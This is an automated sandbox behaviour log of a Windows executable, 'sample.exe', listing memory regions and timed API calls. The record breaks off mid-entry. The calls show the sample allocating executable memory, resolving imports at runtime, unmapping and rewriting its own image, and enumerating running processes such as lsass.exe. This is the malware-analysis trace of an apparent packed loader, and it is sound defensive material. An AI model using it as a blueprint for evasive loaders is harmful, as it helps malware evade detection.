# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Feb 15 2019 13:52:06 # Log Creation Date: 08.03.2019 08:37:01.309 Process: id = "1" image_name = "sample.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe" page_root = "0x7892000" os_pid = "0xe78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "sample.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe") Region: id = 9 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 157 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 158 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 159 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 160 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 161 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 162 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 163 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 164 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 165 start_va = 0x480000 end_va = 0x53dfff entry_point = 0x480000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 166 start_va = 0x746b0000 end_va = 0x74740fff entry_point = 0x746b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 167 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 168 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 169 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 170 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 171 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 172 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 173 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 174 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 175 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 176 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 177 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 178 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 179 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 180 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 181 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 182 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 183 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 184 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 185 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 186 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 187 start_va = 0x8d0000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 188 start_va = 0xa60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 189 start_va = 0x320000 end_va = 0x334fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 190 start_va = 0x340000 end_va = 0x353fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 191 start_va = 0x380000 end_va = 0x399fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 192 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 193 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 194 start_va = 0x1e60000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 195 start_va = 0x3a0000 end_va = 0x3b3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 196 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 197 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 198 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 199 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 200 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 201 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 202 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 203 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 204 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 205 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 206 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 207 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 208 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 209 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 210 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 211 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 212 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 213 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 214 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 215 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 216 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 217 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 218 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 219 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 220 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 221 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 222 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 223 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 224 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 225 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 226 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 227 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 228 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 229 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 230 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 231 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 232 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 233 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 234 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 235 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 236 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 237 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 238 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 239 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 240 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 241 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 242 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 243 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 244 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 245 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Thread: id = 1 os_tid = 0xe7c [0109.896] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="interface\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}", phkResult=0x45214c | out: phkResult=0x45214c*=0xca) returned 0x0 [0109.898] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0109.898] RegQueryValueExW (in: hKey=0xca, lpValueName="", lpReserved=0x0, lpType=0x19ff54, lpData=0x19fcf0, lpcbData=0x19ff4c*=0x12c | out: lpType=0x19ff54*=0x1, lpData="IActiveScriptParseProcedure32", lpcbData=0x19ff4c*=0x3c) returned 0x0 [0109.898] VirtualAlloc (lpAddress=0x0, dwSize=0x14800, flAllocationType=0x3000, flProtect=0x40) returned 0x320000 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0110.771] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x74f40000 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcAddress") returned 0x74f57940 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0110.771] GetProcAddress (hModule=0x74f40000, lpProcName="SetFilePointer") returned 0x74f66530 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="lstrlenA") returned 0x74f63a30 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="lstrcatA") returned 0x74f5efc0 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualProtect") returned 0x74f58c50 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="UnmapViewOfFile") returned 0x74f594b0 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="GetModuleHandleA") returned 0x74f59640 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="WriteFile") returned 0x74f66590 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="CloseHandle") returned 0x74f65f20 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualFree") returned 0x74f58c70 [0110.772] GetProcAddress (hModule=0x74f40000, lpProcName="GetTempPathA") returned 0x74f66410 [0110.773] GetProcAddress (hModule=0x74f40000, lpProcName="CreateFileA") returned 0x74f66170 [0110.773] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0110.773] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x340000 [0110.774] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x380000 [0110.776] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0110.776] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0110.776] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0110.776] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0110.776] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0110.778] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0110.781] GetCurrentProcessId () returned 0xe78 [0110.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc [0110.786] Process32FirstW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.787] GetCurrentProcessId () returned 0xe78 [0110.787] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x61, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.787] GetCurrentProcessId () returned 0xe78 [0110.787] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.788] GetCurrentProcessId () returned 0xe78 [0110.788] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.789] GetCurrentProcessId () returned 0xe78 [0110.789] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.789] GetCurrentProcessId () returned 0xe78 [0110.789] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.790] GetCurrentProcessId () returned 0xe78 [0110.790] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.791] GetCurrentProcessId () returned 0xe78 [0110.791] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.792] GetCurrentProcessId () returned 0xe78 [0110.792] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.793] GetCurrentProcessId () returned 0xe78 [0110.793] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.793] GetCurrentProcessId () returned 0xe78 [0110.793] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.794] GetCurrentProcessId () returned 0xe78 [0110.794] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.795] GetCurrentProcessId () returned 0xe78 [0110.795] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.795] GetCurrentProcessId () returned 0xe78 [0110.795] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.796] GetCurrentProcessId () returned 0xe78 [0110.796] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.796] GetCurrentProcessId () returned 0xe78 [0110.796] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.797] GetCurrentProcessId () returned 0xe78 [0110.797] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.806] GetCurrentProcessId () returned 0xe78 [0110.806] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.806] GetCurrentProcessId () returned 0xe78 [0110.806] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.807] GetCurrentProcessId () returned 0xe78 [0110.807] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, 